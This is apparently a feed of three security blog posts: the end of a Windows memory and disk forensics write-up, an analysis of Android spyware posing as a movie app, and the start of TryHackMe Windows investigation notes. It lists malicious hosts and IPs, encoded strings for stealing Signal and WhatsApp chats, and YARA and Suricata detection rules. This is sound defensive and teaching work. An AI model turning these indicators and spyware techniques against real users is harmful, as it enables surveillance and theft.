3"></a></p> <p>We can see here the first contact with the malicious IP address.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>vol3 <span class="nt">-f</span> DESKTOP-SDN1RTP.mem windows.registry.printkey.PrintKey </code></pre> </div> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--NHeNnAUK--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ck6getc4cebuhf7kag5z.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--NHeNnAUK--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ck6getc4cebuhf7kag5z.png" alt="Memory 4"></a></p> <p>Here we can find a new finding: a suspicious registry key that we saw as well in the DC.</p> <p>However, Volatility seemed to bug trying to get the key value. So this is something we are going to leave when we analyse the whole disk memory.</p> <p>From here, we have the following questions:</p> <ul> <li>For the Desktop, how did the attacker got in? What was the initial access vector?</li> <li>For the Desktop, how did the attacker elevate its privileges?</li> <li>For the DC, how did the attacker pivoted from one station to another?</li> </ul> <h2> Disk Image </h2> <h3> Desktop </h3> <h4> Log Analysis </h4> <p>We could mount the disk images and look around but for the moment we are going to create log timelines and connect the dots from the logs that we will retrieve. Here we are going to focus on the time slice that we found during the first part of the investigation and try to get as much information as we can.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>log2timeline.py <span class="nt">--parsers</span> list log2timeline.py <span class="nt">--parsers</span><span class="o">=</span><span class="s2">"winevtx"</span> <span class="nt">--status_view</span> window desktop-log.dump IMAGE.E01 </code></pre> </div> <p>We just took the EVTX parser as we have some knowledge on how to look into those.</p> <p>Let's filter through our date to find the culprit:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>psort.py <span class="nt">--output_time_zone</span> <span class="s1">'UTC'</span> <span class="nt">-o</span> l2tcsv <span class="nt">-w</span> desktop-04-full.csv desktop-04.dump </code></pre> </div> <p>From the EVTX, we know that <code>coreupdater[.]exe</code> was installed at 2020-09-19 at 03:42:42 UTC.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight xml"><code>5871:09/19/2020,03:42:42,UTC,M..B,EVT,WinEVTX,Content Modification Time; Creation Time,Administrator,DESKTOP-SDN1RPT,[7045 / 0x1b85] Strings: ['c oreupdater' 'C:\\Windows\\System32\\coreupdater....,[7045 / 0x1b85] Source Name: Service Control Manager Message string: A service was installed in the system.\n\nService Name: coreupdater\nService File Name: C:\Windows\System32\coreupdater.exe\nService Type: user mode service\nService S tart Type: auto start\nService Account: LocalSystem Strings: ['coreupdater' 'C:\\Windows\\System32\\coreupdater.exe' 'user mode service' 'aut o start' 'LocalSystem'] Computer Name: DESKTOP-SDN1RPT.C137.local Record Number: 958 Event Level: 4,2,NTFS:\Windows\System32\winevt\Logs\System.e vtx,27975,-,winevtx,message_identifier: 1073748869; recovered: False; sha256_hash: 638e689af45a8e6597bba27c18c53fc304003725f89ff33111c1aa7d46ae27d d; user_sid: S-1-5-21-2232410529-1445159330-2725690660-500; xml_string: <span class="nt">&lt;Event</span> <span class="na">xmlns=</span><span class="s">"http://schemas.microsoft.com/win/2004/08/events/event"</span><span class="nt">&gt;</span>- <span class="nt">&lt;S</span> <span class="err">ystem</span><span class="nt">&gt;</span>- <span class="nt">&lt;Provider</span> <span class="na">Name=</span><span class="s">"Service Control Manager"</span> <span class="na">Guid=</span><span class="s">"{555908d1-a6d7-4695-8e1e-26931d2012f4}"</span> <span class="na">EventSourceName=</span><span class="s">"Service Control Manager"</span><span class="nt">/&gt;</span>- <span class="nt">&lt;EventID</span> <span class="na">Qualifiers=</span><span class="s">"16384"</span><span class="nt">&gt;</span>7045<span class="nt">&lt;/EventID&gt;</span>- <span class="nt">&lt;Version&gt;</span>0<span class="nt">&lt;/Version&gt;</span>- <span class="nt">&lt;Level&gt;</span>4<span class="nt">&lt;/Level&gt;</span>- <span class="nt">&lt;Task&gt;</span>0<span class="nt">&lt;/Task&gt;</span>- <span class="nt">&lt;Opcode&gt;</span>0<span class="nt">&lt;/Opcode&gt;</span>- <span class="nt">&lt;Keywords&gt;</span>0 x8080000000000000<span class="nt">&lt;/Keywords&gt;</span>- <span class="nt">&lt;TimeCreated</span> <span class="na">SystemTime=</span><span class="s">"2020-09-19T03:42:42.676537200Z"</span><span class="nt">/&gt;</span>- <span class="nt">&lt;EventRecordID&gt;</span>958<span class="nt">&lt;/EventRecordID&gt;</span>- <span class="nt">&lt;Correlatio</span> <span class="err">n</span><span class="nt">/&gt;</span>- <span class="nt">&lt;Execution</span> <span class="na">ProcessID=</span><span class="s">"616"</span> <span class="na">ThreadID=</span><span class="s">"5772"</span><span class="nt">/&gt;</span>- <span class="nt">&lt;Channel&gt;</span>System<span class="nt">&lt;/Channel&gt;</span>- <span class="nt">&lt;Computer&gt;</span>DESKTOP-SDN1RPT.C137.local<span class="nt">&lt;/Computer&gt;</span>- <span class="nt">&lt;Securi</span> <span class="err">ty</span> <span class="na">UserID=</span><span class="s">"S-1-5-21-2232410529-1445159330-2725690660-500"</span><span class="nt">/&gt;</span>- <span class="nt">&lt;/System&gt;</span>- <span class="nt">&lt;EventData&gt;</span>- <span class="nt">&lt;Data</span> <span class="na">Name=</span><span class="s">"ServiceName"</span><span class="nt">&gt;</span>coreupdater<span class="nt">&lt;/Data&gt;</span>- <span class="nt">&lt;Data</span> <span class="err">Na</span> <span class="na">me=</span><span class="s">"ImagePath"</span><span class="nt">&gt;</span>C:\Windows\System32\coreupdater.exe<span class="nt">&lt;/Data&gt;</span>- <span class="nt">&lt;Data</span> <span class="na">Name=</span><span class="s">"ServiceType"</span><span class="nt">&gt;</span>user mode service<span class="nt">&lt;/Data&gt;</span>- <span class="nt">&lt;Data</span> <span class="na">Name=</span><span class="s">"StartType"</span><span class="nt">&gt;</span>auto st art<span class="nt">&lt;/Data&gt;</span>- <span class="nt">&lt;Data</span> <span class="na">Name=</span><span class="s">"AccountName"</span><span class="nt">&gt;</span>LocalSystem<span class="nt">&lt;/Data&gt;</span>- <span class="nt">&lt;/EventData&gt;</span>-<span class="nt">&lt;/Event&gt;</span>- </code></pre> </div> <p>So here we know more information, for example the path where the binary is stored and that is has been set up as an autostart thus here we have our persistence.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--T2t-j5fl--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/06yhsxinpo1iydr3q055.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--T2t-j5fl--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/06yhsxinpo1iydr3q055.png" alt="Users"></a></p> <p>Here we can see the name the users of the Desktop, interestingly, there is one user called Admin and one Administrator. It is possible that one is bogus. We know that there as an authentication request between the Desktop and the DC with the Administrator string. We are not sure how to verify that part though.</p> <p>So we still haven't answered the question on how did the attacker got in, we aren't exactly sure how to verify this. But that could be for a latter time, we have enough material to answer all the basic questions and that seems good enough.</p> <h1> Questions </h1> <p>Questions to Answer / Goals</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>What’s the Operating System of the Server? </code></pre> </div> <p>Windows 2012 R2 x64 (Unsure)</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>What’s the Operating System of the Desktop? </code></pre> </div> <p>Windows 2012 R2 x64</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>What was the local time of the Server? </code></pre> </div> <p>UTC -6</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Was there a breach? </code></pre> </div> <p>Yes.</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>What was the initial entry vector (how did they get in)? </code></pre> </div> <p>Meterpreter was used, but initial access is still unsure (TODO)</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Was malware used? If so what was it? If there was malware answer the following: What process was malicious? </code></pre> </div> <p>coreupdater.exe</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> Identify the IP Address that delivered the payload. What IP Address is the malware calling to? </code></pre> </div> <p>203.78.103.109:443</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> Where is this malware on disk? </code></pre> </div> <p>C:\Windows\System32\coreupdater.exe</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> When did it first appear? </code></pre> </div> <p>2020-9-19, 03:42:42 UTC</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> Did someone move it? </code></pre> </div> <p>Not that we know it.</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> What were the capabilities of this malware? </code></pre> </div> <p>Process injection.</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> Is this malware easily obtained? </code></pre> </div> <p>Yes.</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> Was this malware installed with persistence on any machine? When? </code></pre> </div> <p>2020-9-19, 03:42:42 UTC</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> Where? </code></pre> </div> <p>Autoruns</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>What malicious IP Addresses were involved? Were any IP Addresses from known adversary infrastructure? </code></pre> </div> <p>Yes</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> Are these pieces of adversary infrastructure involved in other attacks around the time of the attack? </code></pre> </div> <p>Detection is spoiled by other exercises.</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Did the attacker access any other systems? How? </code></pre> </div> <p>Kerberos Administrator ticket.</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> When? </code></pre> </div> <p>2020-09-19T02:56:03.855</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> Did the attacker steal or access any data? When? </code></pre> </div> <p>Probably, we don't know how to verify that.</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>What was the network layout of the victim network? </code></pre> </div> <p>Internet &lt;-&gt; Desktop &lt;-&gt; DC</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>What architecture changes should be made immediately? </code></pre> </div> <p>Prevent DC to be able to be accessible from the Internet.</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Did the attacker steal the Szechuan sauce? If so, what time? </code></pre> </div> <p>We don't know how to verify that.</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Did the attacker steal or access any other sensitive files? If so, what times? </code></pre> </div> <p>We don't know how to verify that.</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Finally, when was the last known contact with the adversary? </code></pre> </div> <p>2020-09-19T04:08:45.783</p> <h1> Conclusion </h1> <p>This was a fun ride, I think I still have to learn a bit more about how to verify a file access in the Windows log but building up from the PCAP and the Memory was a good fun. At some point, I was feeling I was looking into circles and searching for things I knew were there. But in the end, what matters is the learning process.</p> <p>Let me know if you have questions or comments!</p> security dfir windows chris Wed, 12 May 2021 14:14:29 +0000 https://dev.to/evilcel3ri/the-movie-app-that-watches-you-watching-p6n https://dev.to/evilcel3ri/the-movie-app-that-watches-you-watching-p6n <blockquote> <p>Edit: 2021/05/13: improved the Yara rule to use groups of strings and added a suricata rule</p> </blockquote> <p>How can a movie app be a spyware at the same time?</p> <p>One day, I was checking the malicious apks that have been uploaded to <a href="https://beta.pithis.org" rel="noopener noreferrer">Pithus</a>. I found an application called <a href="https://beta.pithus.org/report/f18aba837e86025dfb9bd3fd2c4bf161f679ff1f3d10e7a480d682178051a9b9" rel="noopener noreferrer"><code>com.hdmovies.freemovieshd</code></a> that is tagged as <code>spyware</code> by various anti-viruses.</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffpevk9a95hbgrdcn8sxa.png" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffpevk9a95hbgrdcn8sxa.png" alt="Virus Total Results"></a></p> <h2> Quick static analysis </h2> <p>First, here are some basics regarding the code retrieved from Pithus:</p> <ul> <li>some of the code is obfuscated: <img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fppn3owbk8z7qo71aztpa.png" alt="pithus result"> </li> <li>the list of permissions on Pithus extends from read/write external storage, send/read/receive SMS, access fine location, camera, phone permissions, get accounts, read/write contacts... Too much permissions, it's fishy.</li> <li>the network data has some suspicious domains such as <code>ifronttech[.]in</code> </li> </ul> <p>Here we know that this app is <em>somewhat</em> malicious but how deep can we go?</p> <h2> Quick dynamic analysis </h2> <p>Then, we launched the app in tria.ge (see <a href="https://tria.ge/210507-cgt2rcldz2/behavioral1" rel="noopener noreferrer">results</a>) to have some idea of the behaviour of our target.</p> <p>The app seems aware of possible emulation and didn't return us substantial results except this network section sent at the launch of the app:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Remote address: 166.62.28\.102:80 Request GET /JSONAPI/AppXender/HDMovies.json HTTP/1.1 User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; sdk_gphone_x86_64_arm64 Build/RSR1.201211.001.A1) Host: ifronttech\.in Connection: Keep-Alive Accept-Encoding: gzip Response HTTP/1.1 200 OK Date: Fri, 07 May 2021 19:31:27 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Last-Modified: Sun, 17 Jan 2021 13:38:54 GMT ETag: "b3c057b-2d1-5b918ba013f9e-gzip" Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Content-Length: 415 Keep-Alive: timeout=5 Content-Type: application/json </code></pre> </div> <p>At this time, we don't know if that is a network check or a C2 communication. We'll need to investigate the code itself.</p> <h2> Longer static analysis </h2> <p>So it's time to boot up JADX.</p> <p>Classes before deobfuscation:</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9bm7ixp166oqymmh4x51.png" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9bm7ixp166oqymmh4x51.png" alt="Before deobfuscation"></a></p> <p>Classes after deobfuscation:</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffj4ivdr9mwxohw2vyh6h.png" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffj4ivdr9mwxohw2vyh6h.png" alt="After deobfuscation"></a></p> <p>The most interesting part of the code is located in the package: <code>com.hdmovies.freemovieshd.watchmovies.info</code> and everything under. The name of those classes are obviously obfuscated but that doesn't prevent us from getting the general logic of the code.</p> <h3> Obfuscation technique </h3> <p>The code implements a custom deobfuscation technique with the method <code>huhaa46()</code> from the <code>qedthong</code> class, illustrated here:</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F164msa91g5gzajacic6v.png" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F164msa91g5gzajacic6v.png" alt="Obfuscation technique"></a></p> <p>If will remove the "hognq" part of the string if it founds it and then try to decode it from base64. There a number of variables from options values to export files that are simply encoded in base64 and not using that system.</p> <h3> The app will scan for all your files </h3> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9uu1oxb20kb6ilby7kzu.png" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9uu1oxb20kb6ilby7kzu.png" alt="File grabber"></a></p> <p>This function will scan for files in your external storage and then process them with the obfuscated function <code>qnqwerhong.qsavelivethong()</code>.</p> <p>This function will create a file which name is encoded in Base64 (<code>TGl2ZS50eHQ=</code> which decode to <code>file.txt</code>) with the name of all the scanned files.</p> <h3> The app will record you </h3> <p>In <code>qhieightrehong</code> class you can see the app setting up the audio module from your phone and launch the mic with <code>setSpeakerPhoneOne(true)</code> (<a href="https://developer.android.com/reference/android/media/AudioManager#setSpeakerphoneOn(boolean)" rel="noopener noreferrer">link</a> to Android documentation).</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnpt1pxp127ssuwj6isg5.png" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnpt1pxp127ssuwj6isg5.png" alt="Recording section"></a></p> <h3> The app will steal your Signal or Whatsapp conversations </h3> <p>This might be the most substantial findings in the analysis of this application. It will look for archives of your Signal or Whatsapp folders and then grab everything it can from it.</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F328jln93w53h4h4j42hn.png" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F328jln93w53h4h4j42hn.png" alt="WhatsApp/Signal grabber"></a><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>b3JnLnRob3VnaHRjcmltZS5zZWN1cmVzbXMvLmNvbnZlcnNhdGlvbi5Db252ZXJzYXRpb25BY3Rpdml0eQ== =&gt; org.thoughtcrime.securesms/.conversation.ConversationActivity Y29tLndoYXRzYXBwLy5Db252ZXJzYXRpb24= =&gt; com.whatsapp/.Conversation </code></pre> </div> <h3> The app will log your phone calls </h3> <p>The app will log your phone calls and get the list of your contacts.</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fablfndbirb83dnyub54d.png" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fablfndbirb83dnyub54d.png" alt="Phone call logger"></a></p> <h3> The app will check your wifi and geolocalise it </h3> <p>Not only the app will get your wifi information but it will try to geolocalise you using those information. Indeed, some wifi have geographic coordinates.</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fns24h4nt5l4xdqsw8f0y.png" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fns24h4nt5l4xdqsw8f0y.png" alt="Alt Text"></a></p> <h3> The app will get your carrier and all the information about your device </h3> <p>The application will get all the information from your network carrier and your device. Frankly, at this point we aren't surprised anymore.</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwdrqsow9esx1b6q9tmko.png" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwdrqsow9esx1b6q9tmko.png" alt="Carrier logger"></a></p> <h3> The app will steal your account tokens from your apps </h3> <p>Each time you log in to an app, the account is linked to it with a token. This malware will steal those accounts allowing further hacking to your online accounts.</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fatpjymf3fbwakfvzxp4y.png" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fatpjymf3fbwakfvzxp4y.png" alt="App tokens grabber"></a></p> <h3> Noisy logging </h3> <p>The app seems to be quite poorly coded. A lot of the obfuscation techniques are quite easy to deobfuscate and the app has a lot of very noisy, poorly written logging (allowing so much better hunting!).</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvkge8p3ei8ujf7z4m9s9.png" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvkge8p3ei8ujf7z4m9s9.png" alt="Noisy logs"></a></p> <h2> Conclusion </h2> <p>This application allows us to finally accomplish our dream to tbe hero of the films we watch... by watching us!</p> <p>The persistance process is made through the calendar relaunching the application in case it isn't running. The application will set up cancelled events here and there and when they ring, they will relaunch the application.</p> <p>The application stores the entire stolen data in .txt files and in a sqlite database with md5 on the phone itself and then, probably send it over encrypted TCP communication as we saw function implementing encryption process. In case you want to run this application in a dynamic environment, you might want to look for that.</p> <p>So, all in all, it's a spyware. Thank you for reading, let me know if you have questions or improvements, I'm still new at this!</p> <h2> Network indicators </h2> <ul> <li>fronttech[.]in</li> <li>instadownload[.]buzz</li> <li>135.181.154[.]21</li> </ul> <h2> Hunting rules: </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>rule crime_unknown_eight { meta: date = "2021-05-10" author = "@evilcel3ri" description = "Detects a specific spyware with keylogging capabilities" strings: $a = "ifronttech.in" $b = "b3JnLnRob3VnaHRjcmltZS5zZWN1cmVzbXMvLmNvbnZlcnNhdGlvbi5Db252ZXJzYXRpb25BY3Rpdml0eQ==" $c = "Y29tLndoYXRzYXBwLy5Db252ZXJzYXRpb24=" $d = "hognq" ascii $e = "HD_Movie1_8_321tn" ascii $f = "ppbew.txt" ascii $g = "dGhpcyBpcyBhZ2RmaGdkZmgga2V5" $h = "Removeing files" ascii $k = "bew.txt" ascii condition: uint16(0) == 0x6564 and (($a or $e) or ((($b or $d or $c or $g) and ($k or $h or $f)))) } </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"PUA/Spyware HDMovies suspicious host fronttech in";http.host;content:"ifronttech.in";http.uri;content:"/JSONAPI/AppXender/HDMovies.json";flow:to_server,established;) </code></pre> </div> <h2> Details </h2> <p>See details page on Pithus: <a href="https://beta.pithus.org/report/f18aba837e86025dfb9bd3fd2c4bf161f679ff1f3d10e7a480d682178051a9b9" rel="noopener noreferrer">https://beta.pithus.org/report/f18aba837e86025dfb9bd3fd2c4bf161f679ff1f3d10e7a480d682178051a9b9</a></p> <blockquote> <p>Pithus is an open-source static analysis tool for malicious Android application. Check it out at: <a href="https://beta.pithus.org" rel="noopener noreferrer">https://beta.pithus.org</a></p> </blockquote> security android malware chris Fri, 26 Feb 2021 12:36:32 +0000 https://dev.to/evilcel3ri/investigations-in-windows-on-tryhackme-1-376 https://dev.to/evilcel3ri/investigations-in-windows-on-tryhackme-1-376 <p>I've been talking about Windows investigation <a href="https://dev.to/christalib/searching-windows-event-logs-for-fun-5dnd">last time</a> with EVTX. Since then, I've been reading about investigations in Windows environment and warming up <a href="https://dev.to/christalib/powershell-quand-on-ne-connait-que-linux-kfe">my Powershell</a>.</p> <p>On TryHackMe, there are a 3 "Investigating Windows" boxes (<a href="https://tryhackme.com/room/investigatingwindows">one</a>, <a href="https://tryhackme.com/room/investigatingwindows2">two</a>, <a href="https://tryhackme.com/room/investigatingwindows3">three</a> ) and I thought it could be cool to go there. Those notes are more notes taken during the investigation than a write up. There are write ups online for the first box but they just give you the answer which really doesn't help you at all.</p> <h2> Information gathering </h2> <p>The first questions are about quick gathering of information, I've updated the commands used in my <a href="https://github.com/christalib/yaCTFpl/blob/aleph/manual.md#windows-3">field manual</a>.</p> <p>A quick triage can be done with those common commands used in local reconnaissance:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">hostname</span><span class="w"> </span><span class="nx">systeminfo</span><span class="w"> </span><span class="n">systeminfo</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">findstr</span><span class="w"> </span><span class="nx">/B</span><span class="w"> </span><span class="nx">/C:</span><span class="s2">"OS Name"</span><span class="w"> </span><span class="nx">/C:</span><span class="s2">"OS Version"</span><span class="w"> </span></code></pre> </div> <p>Then go gather information about users and their login time:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>net users net localgroup users net localgroup administrators net user &lt;NAME&gt; | findstr /B /C:"Last logon" </code></pre> </div> <p>And some powershell magic for the latter part:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="kr">ForEach</span><span class="w"> </span><span class="p">(</span><span class="nv">$user</span><span class="w"> </span><span class="kr">in</span><span class="w"> </span><span class="n">Get-LocalUser</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="n">echo</span><span class="w"> </span><span class="nv">$user</span><span class="o">.</span><span class="nf">Name</span><span class="w"> </span><span class="nv">$user</span><span class="o">.</span><span class="nf">Lastlogon</span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>It is also possible to look in the Event Viewer and search manually for those login information. I did it, it awfully slow, too much noise and prone to errors. The Event Viewer is a really strong and powerful tool, but as long as you look for really quick information, Powershell seems to be enough.</p> <p>The next step, as it is to look for scheduled tasks that could link to persistence of some malwares.</p> <p>You can open the task scheduler manager (check <a href="https://blog.malwarebytes.com/cybercrime/2015/03/scheduled-tasks/">this link</a> for some information on how to use it in forensics) or try to go through the command line:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Get-ScheduledTask</span><span class="w"> </span><span class="c"># in the first box there are a bunch of suspicious files in "\"</span><span class="w"> </span><span class="n">Get-ScheduledTask</span><span class="w"> </span><span class="nt">-TaskPath</span><span class="w"> </span><span class="s2">"\"</span><span class="w"> </span><span class="n">Get-ScheduledTask</span><span class="w"> </span><span class="nt">-TaskPath</span><span class="w"> </span><span class="s2">"&lt;NAME&gt;"</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Get-ScheduledTaskInfo</span><span class="w"> </span><span class="c"># check what kind of actions is ran for each task to find malicious scripts:</span><span class="w"> </span><span class="n">Get-ScheduledTask</span><span class="w"> </span><span class="nt">-TaskPath</span><span class="w"> </span><span class="s2">"\"</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-Object</span><span class="w"> </span><span class="nt">-Property</span><span class="w"> </span><span class="nx">TaskName</span><span class="w"> </span><span class="nt">-ExpandProperty</span><span class="w"> </span><span class="nx">Actions</span><span class="w"> </span></code></pre> </div> <p>You should also look into AutoRuns at startup:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Get-CimInstance</span><span class="w"> </span><span class="nx">Win32_StartupCommand</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-Object</span><span class="w"> </span><span class="nx">name</span><span class="p">,</span><span class="w"> </span><span class="nx">command</span><span class="p">,</span><span class="w"> </span><span class="nx">location</span><span class="p">,</span><span class="w"> </span><span class="nx">user</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Format-List</span><span class="w"> </span></code></pre> </div> <h2> Attack context </h2> <p>Now, you should have a general overview of the attack on those machines. Writing notes really helped me remembering the steps and from now I will do it each time. It's of utmost important to be really attentive to each details you see and try to get in the head of the attacker. Especially not to loose yourself in a rabbit 